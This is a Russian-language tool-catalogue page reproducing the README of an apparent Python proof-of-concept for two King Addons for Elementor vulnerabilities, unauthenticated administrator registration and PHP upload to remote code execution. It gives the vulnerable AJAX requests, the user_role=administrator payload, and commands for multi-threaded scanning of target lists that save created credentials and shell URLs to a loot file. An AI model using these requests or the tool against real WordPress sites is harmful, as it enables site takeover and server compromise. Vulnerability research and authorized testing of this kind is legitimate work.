Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6325_CVE-2025-6327 — Python PoC для проверки CVE-2025-6325 (неаутентифицированное повышение привилегий) и CVE-2025-6327 (RCE через произвольную загрузку файлов) в King Addons for Elementor <= 51.1.36. | Kitploit
Инструменты/GitHubGitHub/johenlastgen-jlg/cve-2025-6325_cve-2025-6327
Повышение привилегийСканеры уязвимостейАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed TeamingКраулер

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Разработка Полезной Нагрузки
GitHubjohenlastgen-jlg/cve-2025-6325_cve-2025-6327

CVE-2025-6325_CVE-2025-6327

Python PoC для проверки CVE-2025-6325 (неаутентифицированное повышение привилегий) и CVE-2025-6327 (RCE через произвольную загрузку файлов) в King Addons for Elementor <= 51.1.36.

Репозиторий
8 ч 10 мин назадЕщё не проверено

CVE-2025-6325 + CVE-2025-6327

King Addons for Elementor — Dual Exploit PoC

Инструмент для исследования и валидации King Addons for Elementor <= 51.1.36, охватывающий две задокументированные уязвимости:

  • CVE-2025-6325 — Неаутентифицированное повышение привилегий
  • CVE-2025-6327 — Неаутентифицированная загрузка произвольных файлов, приводящая к RCE

Только для авторизованного тестирования безопасности, исследования уязвимостей и контролируемых лабораторных сред.


Обзор

Этот проект предоставляет двухцелевой PoC для валидации влияния на безопасность двух уязвимостей в King Addons for Elementor.

CVE-2025-6325

Неаутентифицированное повышение привилегий через функциональность регистрации King Addons.

Уязвимый поток принимает контролируемое клиентом значение user_role и передаёт его в создание пользователя WordPress без применения соответствующего списка разрешённых ролей.

Уязвимая версия: <= 51.1.36 Исправленная версия: 51.1.37

Уязвимый поток регистрации использует:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_user_register
user_role=administrator

PoC также проверяет, может ли созданная учётная запись аутентифицироваться и получить доступ к странице администрирования пользователей WordPress.

CVE-2025-6327

Неаутентифицированная загрузка произвольных файлов через функциональность загрузки конструктора форм King Addons.

Уязвимый обработчик загрузки может некорректно принять PHP-файл, что приводит к появлению доступного через веб загруженного файла и потенциальному выполнению кода на стороне сервера.

Уязвимая версия: <= 51.1.36 Исправленная версия: 51.1.37

Соответствующее AJAX-действие:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_upload_file

PoC валидирует поток загрузки и проверяет, может ли загруженный тестовый файл выполнить безвредную команду id.


Возможности

  • Валидация двух уязвимостей
  • Валидация повышения привилегий CVE-2025-6325
  • Валидация загрузки/RCE CVE-2025-6327
  • Пассивный режим обнаружения nonce
  • Тестирование одной цели
  • Поддержка списка целей для пакетной обработки
  • Многопоточное выполнение
  • Автоматический обход страниц
  • Обнаружение через sitemap
  • Настраиваемая глубина обхода
  • Настраиваемое максимальное количество страниц
  • Настраиваемый HTTP-таймаут
  • Вывод результатов в формате TSV
  • Вывод успешной валидации / добычи
  • Опциональный вывод терминала без цветов
  • Только стандартная библиотека Python

Скрипт поддерживает четыре режима работы:

root@kitploit:~
check
privesc
upload
both

Эти режимы доступны напрямую через интерфейс командной строки.


Требования

Требуется Python 3.

Сторонние пакеты Python не требуются.

Проверьте версию Python:

root@kitploit:~
python3 --version

Использование

Одна цель

Запустить обе проверки уязвимостей:

root@kitploit:~
python3 exploit.py -u http://target.local --exploit both

Пассивная проверка

Обнаружить открытые nonce King Addons без запуска этапов эксплуатации:

root@kitploit:~
python3 exploit.py -u http://target.local --exploit check

Валидация повышения привилегий

root@kitploit:~
python3 exploit.py -u http://target.local --exploit privesc

Валидация загрузки/RCE

root@kitploit:~
python3 exploit.py -u http://target.local --exploit upload

Пакетные цели

Создайте файл целей:

root@kitploit:~
http://target1.local
https://target2.local
http://target3.local

Комментарии и пустые строки игнорируются.

Запустить пассивную оценку:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit check

Запустить оба этапа валидации:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit both -t 20

Запустить валидацию загрузки:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit upload -t 20

Запустить валидацию повышения привилегий:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit privesc -t 20

Параметры обхода

PoC автоматически ищет на страницах цели nonce, необходимые для двух уязвимых потоков.

Настройки обхода по умолчанию:

root@kitploit:~
Depth      : 3
Max pages  : 80
Timeout    : 20 seconds
Threads    : 10

Эти значения по умолчанию определены в конфигурации CLI скрипта.

Пример:

root@kitploit:~
python3 exploit.py \
  -l targets.txt \
  --exploit both \
  -t 20 \
  --depth 3 \
  --max-pages 80 \
  --timeout 20

Параметры командной строки

По умолчанию скрипт использует results.tsv для структурированных результатов и loot.txt для записей успешной валидации.


Вывод

Во время выполнения инструмент сообщает о нескольких состояниях.

SHELL

Указывает, что валидация загрузки прошла успешно и тестовый PHP-файл ответил на проверочный запрос.

Пример:

root@kitploit:~
PWNED [SHELL]

PRIV

Указывает, что валидация повышения привилегий создала учётную запись с использованием уязвимого потока регистрации.

Инструмент дополнительно фиксирует, была ли учётная запись проверена на странице администрирования пользователей WordPress.

VERIFIED

Созданная учётная запись успешно аутентифицирована и подтверждена на странице пользователей WordPress.

UNVERIFIED

Запрос на регистрацию прошёл успешно, но последующий этап проверки не смог подтвердить созданную учётную запись.

CLEAN

Успешный результат валидации не получен.

ERR

Цель вызвала сетевую ошибку, ошибку парсинга, обхода или другую ошибку выполнения.


Результаты

Структурированные результаты записываются в формате TSV:

root@kitploit:~
results.tsv

Вывод содержит поля для:

root@kitploit:~
target
status
shell_url
shell_rce
priv_user
priv_pwd
priv_verified
err

Этот формат удобен для импорта результатов в электронные таблицы или дальнейшей обработки.

Записи успешной валидации дополнительно записываются в:

root@kitploit:~
loot.txt

Скрипт записывает результаты валидации shell и привилегий как отдельные записи.


Поток уязвимости

CVE-2025-6325

root@kitploit:~
Visitor
   │
   ▼
Public King Addons Register Form
   │
   ▼
Nonce discovery
   │
   ▼
king_addons_user_register
   │
   ▼
Client-controlled user_role
   │
   ▼
WordPress user creation
   │
   ▼
Privilege escalation validation

PoC специально отправляет:

root@kitploit:~
user_role=administrator

на эндпоинт регистрации.

CVE-2025-6327

root@kitploit:~
Visitor
   │
   ▼
King Addons Form Builder
   │
   ▼
Upload nonce discovery
   │
   ▼
king_addons_upload_file
   │
   ▼
PHP test file upload
   │
   ▼
Uploaded file URL
   │
   ▼
Benign execution verification

PoC использует уникально сгенерированное имя тестового файла и проверяет возвращённый URL загрузки.


Лабораторная проверка

Реализация исследования была протестирована на:

root@kitploit:~
WordPress 6.8 / 7.1
Elementor 4.2.3
King Addons 51.1.14

В заметках исследования сообщается об успешной валидации обоих потоков в контролируемой лабораторной среде, включая повышение привилегий и выполнение shell. Также был протестирован отрицательный контроль на версии 51.1.37.


Важное примечание о версиях

В заметках исследования указано, что некоторые ZIP-релизы WordPress.org для 51.1.35 и 51.1.36 были впоследствии перетегированы с частичными исправлениями.

Таким образом, уязвимая реализация была подтверждена с использованием указанного тега SVN 51.1.14.

При воспроизведении исследования используйте точную лабораторную версию и пакет, указанные в исследовании, а не предполагайте, что каждый пакет с меткой 51.1.35 или 51.1.36 содержит идентичный уязвимый код.


Ответственное использование

Этот проект предназначен для:

  • Авторизованного тестирования на проникновение
  • Исследования уязвимостей
  • Валидации безопасности
  • Сред CTF
  • Локальных тестовых лабораторий
  • Исследований в области защитной безопасности

Тестируйте только те системы, на которые у вас есть явное разрешение.

Не используйте этот проект против инфраструктуры третьих сторон без разрешения.

Автор не поощряет несанкционированный доступ, закрепление, кражу данных или нарушение работы систем.


Отказ от ответственности

Это программное обеспечение предоставляется для исследований в области безопасности и авторизованного тестирования.

Вы несёте ответственность за обеспечение соответствия вашего использования этого проекта применимым законам, нормативным актам, договорам и требованиям авторизации.

Автор и участники не несут ответственности за неправомерное использование, ущерб, нарушение работы сервисов, потерю данных или иные последствия, возникшие в результате несанкционированного использования.


Автор

JohenLastGen — JLG NETWORK

Research & Security Tooling

Telegram:

@johenlastgen

Канал:

@jlgnetworkredirect


Лицензия

MIT License

См. LICENSE для полного текста лицензии.

Скачать инструмент
ПараметрОписание
-u, --urlТестировать один URL цели
-l, --listФайл, содержащий URL целей
-e, --exploitВыбрать check, privesc, upload или both
-t, --threadsКоличество параллельных воркеров
--depthМаксимальная глубина ссылок при обходе
--max-pagesМаксимальное количество страниц на цель
--timeoutТаймаут HTTP-запроса в секундах
-o, --outputВывод результатов в TSV
--lootВывод успешной валидации
--no-colorОтключить цвета терминала